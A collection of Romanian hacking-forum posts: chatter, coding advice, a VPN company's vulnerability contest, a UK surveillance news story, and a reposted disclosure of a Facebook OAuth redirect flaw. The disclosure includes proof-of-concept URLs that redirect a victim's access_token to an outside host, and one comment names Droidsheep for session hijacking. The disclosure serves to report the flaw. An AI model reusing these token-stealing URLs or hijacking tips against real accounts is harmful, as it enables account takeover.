Cheater

Play and win! Nice job!

Daca faci prosti pe net trebuie curatat si cablul de retea cu smirghelul apoi lasat 1-2h in acid azotic sa se duca toate urmele )

Felicitarile mele pt presa!

Ai ceva background pe telecomunicatii? sau ai tras ceva, esti bine?

Bravo, daca ai inceput de acum, ai o aptitudine pt asta, si poate peste cativa ani vedem si noi un remi gaillard de romania, sau cineva ce o sa duca numele tarii mai departe, inca un + pe scena internationala.

In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth. This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts. For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program. Nir also demonstrated that an attacker is even able to gain knowledge of which application their victims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks. Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users. POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1 POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1 The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords. Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps. SURSA: URL Redirection flaw in Facebook apps push OAuth vulnerability again in action - Hacking News

Cu siguranta nu prin ping... Nu mai faceti offtopic!....WARN!

Scriptul tau ar trebui sa fie in felul urmator: 1. urci o poza, o redimensionezi la 1/2 rezolutii cum ai nevoie, o denumesti dupa numele ce il introduce userul in admin in locatia fizica ce ti-o alegi. 2. la alegerea numelui pozei, verifici cu ajax daca numele exista, si afisezi de asemenea verifici din php la upload 3. scri intr-un tabel id uni al pozei, numele, si id produsului 4. In admin faci o afisare similara cu cea din frontend, dar inserezi link de stergere ce contine id pozei. La afisare citesti din tabel toate pozele ce apartin prod, cu id, respectiv, ordonate dupa id, suplimentar poti face si o coloana cu nr de ordine sa poata sa le ordoneze custom. Practic din db, citesti numele cu care ai redenumit poza, si la afisare construiesti tagul incluzand locatia unde o salveaza. Cam asta trebuie tu sa scri acolo, vezi ce pas din astia ai omis, probabil daia nu merge, sau de multe ori ca sa iti fie mai usor nu o scri de ex in db, dupaia iti dai seama ca nu-i. Mai poti avea probleme la upload din cauza functiei de redimensionare, de obicei se foloseste GD pt asta, vezi ca php sa aibe modulul. Astfle daca extensia e jpg sa zicem si tu o validezi, apoi faci redimensionare pt jpg, dar poza e de fapt png nu iti va merge.

pe sursele pulii, de parca basescu e miezu....

+ frecventa sare dupa un algoritm ce este schimbat la inceputul apelului

Ce trebuie sa fac? Gasesti una sau mai multe vulnerabilitati exploatabile pe https://www.rotunneling.net/ , le raportezi la support@rotunneling.net si RedShift IT SRL iti va scrie o scrisoare de recomandare, oficiala, semnata si stampilata ce iti atesteaza cunostiintele si o poti folosi in CV, interviuri, conferinte oficiale. Conditii de participare: Procedura de inscriere este simpla: 1. Intri pe siteul RoTunneling.Net . 2. Gasesti una sau mai multe vulnerabilitati exploatabile. 3. Scri o recenzie, intre 70 si 400 caractere. 4. O trimiti pe mailul support@rotunneling.net in care mentionezi numele tau. - fiecare concurent poate avea mai multe recenzii cu care participa. - pentru ca un concurent sa se inscrie cu mai multe recenzii, cu fiecare trebuie sa urmeze pasi 1-6 de mai sus. Perioada de desfasurare: Campania se desfasoara intre 26.03.2013 si 26.04.2013. Cum validam recenziile de securitate informatica? Vom valida fiecare inscriere in termen de 48 ore de la primirea mailului pe support@rotunneling.net, confirmand sau infirmand in acest termen respectarea conditiilor de participare prin mail. Jurizarea se va face de catre unul din reprezentantii RedShift IT S.R.L. ce va avea in vedere: - originalitate; - creativitate; - relevanta; - corectitudinea informatiilor. - nu luam in considerare rezultarele scannerelor, sunt valide doar vulnerabilitatiile gasite cu scripturi/tooluri proprii, respectiv manual. - atacurile de tip ddos, flood, nu sunt luate in considerare. Premiul: RedShift IT SRL iti va scrie o scrisoare de recomandare, semnata si stampilata, oficial, ce iti atesta cunostiintele ce o poti folosi in CV, conferinte, interviuri respectiv oricunde ai nevoie. Vor fi declarate castigatorare recenziile cu cel mai mare scor general, castigatorii vor fi anuntati in maxim 3 zile lucratoare de la jurizare pe siteul https://www.rotunneling.net/ si pagina de facebook https://www.facebook.com/RoTunneling . Cele mai bune recenzii vor fi afisate pe siteul https://www.rotunneling.net/ impreuna cu numele concurentului, iar prin participarea la acest concurs, concurentii isi dau acordul explicit pentru aceasta. Vulnerabilitatiile nu pot fi facute publice fara acordul explicit RedShift IT SRL, in functie de vulnerabilitate vom da curs cererilor de publicare, daca este cazul, dupa ce acestea sunt reparate. Mult succes! Echipa RoTunneling.Net Sursa: https://www.rotunneling.net/articole/rotunneling-vpn-organizeaza-primul-concurs-pentru-hackeri/

ptiu, pe cand ma bucuram ca in loc de hackeri le-a zis mai corect, falsificatori, dau de: Eh in timp speram sa invete...

Ce-i prostia asta...hai sa lamurim o chestie; STS/SRI, inregistreaza toate apelurile din Romania, toate, indiferent de persoana and stuff. Iar cand se asculta se asculta din inregistrari persoanele targetate, deci local, astfel nu o sa iti dai seama neam dupa sunete sau alte prosti, poate era o chestie acum 100 de ani cand erau centrale dalea, de ca sa suni la cineva trebuia sa ceri centralistei si iti facea legatura.

Htx one x +, vine cu casti beatsaudio, si are integrat un soft special de a optimiza sunetul pt aceste casti. Alternativ poti sa iti iei orice htc ce are beatsaudio, si casti separat, casti bune sunt pe la 300 euro, dar merita.

Nu, si l-as raporta la adminul de retea sau unde e cazu. Dar 90% din angajati, inspecial cei ce nu au o pasiune pt it cu siguranta ar da.

Contesta amenta in instanta si mergi mai departe!

Te-ai laudat degeaba; php si javascript = scripting html = markup language css = style sheet language mysql = baza de date Din care nici unul nu are vreo treaba cu programarea, nu este limbaj de programare. Vezi ce sunt alea de dupa egal pe wikipedia, sa nu te mai faci de ras alta data. Welcome!

Old, a mai fost postat, spuffff.

In Bucuresti, intre Universitate si Kogalniceanu, era un tip acum cativa ani care facea aceeasi chestie, m-a acostat de vreo 2-3 ori dar nu i-am dat prea mare importanta inselatoriei, evident nici nu m-am lasat inselat. Funny a fost ca ultima data l-am intalnit la Unirii incerca sa imi vanda nuj ce bilete la un concert, de data asta in romana, atunci i-am si batut obrazul.

RNS in varianta siriana, numai ca sirieni pare-se ca sunt Script kiddie, de nici un deface politic nu stiu sa dea.

Un experiment asemanator a fost facut si in Bucuresti la Cocor. Un violonist de renume canta la Stradivarius, interesant a fost ca uni din trecatori si-au dat seama ca nu este un simplu 'muzician'

Root + Droidsheep, pe tabletele cu android si face mim, de deturnezi sesiunea.

Na belea, si eu ma bucurasem ca mi-am criptat telefonul.... Deci trb sa fi pe faza ca la pc, sa fie oprit la nevoie.

Felicitari pt initiativa! Daca faceti la fac oracle, fiti atenti ca va prinde bine! In enterprise se lcreaza in mod deosebit cu el sau u mssql.

UK government plans to track ALL web use: MI5 to install 'black box' spy devices to monitor British internet traffic MPs' report outlines spooks' take on the draft Communications Data Bill It shows they are keen to implement nationwide surveillance regime They want ISPs to install 'black boxes' that can inspect all internet traffic Spies claim they are only interested in 'communications data' Campaigners warn it will give spies unprecedented surveillance powers UK spy agencies want to install 'black box' surveillance devices across the country's communications networks to monitor internet use, it emerged today. A report by an influential committee of MPs tells how spooks are keen to implement a nationwide surveillance regime aimed at logging nearly everything Britons do and say online. The spy network will rely on a technology known as Deep Packet Inspection to log data from communications ranging from online services like Facebook and Twitter, Skype calls with family members and visits to pornographic websites. But civil liberties and privacy campaigners have reacted with outrage, saying that the technology will give the government a greater surveillance capability than has ever been seen. The report by Parliament's Intelligence and Security Committee, published on Tuesday, gives UK intelligence agencies' perspective on the government's draft Communications Data Bill, which is intended to update surveillance powers. The government argues that swift access to communications data is critical to the fight against terrorism and other high-level crime, but it has been delayed after the Liberal Democrats dropped support for the bill. MI5 chief Jonathan Evans told the committee: 'Access to communications data of one sort or another is very important indeed. It’s part of the backbone of the way in which we would approach investigations. 'I think I would be accurate in saying there are no significant investigations that we undertake across the service that don’t use communications data because of its ability to tell you the who and the when and the where of your target’s activities.' The Bill has encountered stiff opposition, but authorities have been at pains to stress that they're not seeking unfettered access to the content of emails or recordings of phone calls. Instead, they claim, what they are after is what many have described as 'outside of the envelope' information: Who sends a message, where and how it is sent, and who receives it. For example, while the email addresses of senders and recipients would be available to agencies, they would still need to obtain a court order for access to the contents of the emails. A similar situation would apply in the case of mobile phone calls, with the callers' identities and locations available to agencies, along with the time of the call and its duration, but agents restricted from listening without authorisation from the courts. Critics have said that in effect there is no way to reliably separate such communications data from the content of messages and calls, and that giving easy access to the former would also open the way to access of the latter. Campaigners also challenged the government over how it could criticise totalitarian regimes overseas which may be using similar systems to crack down on dissent. Emma Carr, deputy director of privacy and civil liberties campaign group Big Brother Watch, said: 'Using highly intrusive technology to monitor how people use the internet is not something that a civil society should be using on every citizen. 'The danger is that the whole communication, including content, is inspected and potentially stored, intruding on people’s privacy in a dangerous and unprecedented way. 'This sends a highly dangerous signal to regimes around the world who are looking for justification to use similar equipment on their populations. 'The fact that at no point does the Government need court approval, either to install, use or look at data gathered is a major concern and if it is to be used as a last resort should only be done so on the highest judicial authority.' Jim Killock, executive director of the Open Rights Group, which campaigns for freedom online, said the real threat was posed by the addition of what the report calls the 'filter' to the surveillance system. He explained that this would work as a kind of search engine for everyone's private data, linking it together from the various online and telecoms accounts people use to communicate. 'The really worrying part of this is the "filter" the government wants to build,' he told MailOnline. 'This would put data from your mobile phone, email, web history and phones together, so the police can tell who your friends are, what your opinions are, where you've been and with who. 'It could make instant surveillance of everything you do possible at the click of a button.' A key challenge for the government has been extracting that information from overseas service providers - companies based in Silicon Valley or elsewhere that might not feel obliged to comply with a British spy agency's request. FOIL THE LISTENERS: HOW TO ENCRYPT YOUR COMMUNICATIONS While the government has insisted that it will not invade the privacy of citizens' communications without a court order, there are fears that installing deep packet inspection across the UK will nevertheless give them the capability. Luckily, there is a range of software for both computers and mobile devices, much of it free, that can encrypt communications to keep it secure. 1) iSafeguard Freeware 6.2: This program will secure emails and files using strong encryption and syncs with most popular email clients. 2) HushMail: This web-based email service uses a Java applet to encode emails with 1024bit public key encryption. 3) GnuPG: This Linux-only application is an open-source replacement for PGP (Pretty Good Privacy). PGP was one of the first military-grade encryption products available to the general public. It was in those cases, the committee's report said, that the surveillance devices would come in handy. 'It is important for the agencies that there is some means of accessing communications data from uncooperative overseas communications service providers,' the report said. The report said the probes would work using 'deep packet inspection,' so-called because it allows those intercepting packets of data to comb through their content. The services that might be targeted by the probes weren't identified, although Facebook, Twitter, Hotmail, and Google Chat are all popular in Britain and were among the services named elsewhere in the report. Britain's surveillance plans remain in draft form, and the report carried several critiques of the government's proposals. But in general it rejected opponents' claims that the surveillance regime was unworkable or oppressive, warning that the pace of technological change would soon 'have a serious impact on the intelligence and security agencies' unless the new surveillance powers were introduced. The report also appeared to reject suggestions that encryption might allow those trying to maintain the privacy of their communications to baffle government monitoring. 'We have heard that the government has (redacted) options in dealing with the challenge encryption poses,' the report said. The next two paragraphs were completely blanked out. Mr Killock of the Open Rights Group said it was unlikely that the government had the capability to crack advanced digital encryption. Sursa: MI5 to install 'black box' spy devices to monitor UK internet traffic | Mail Online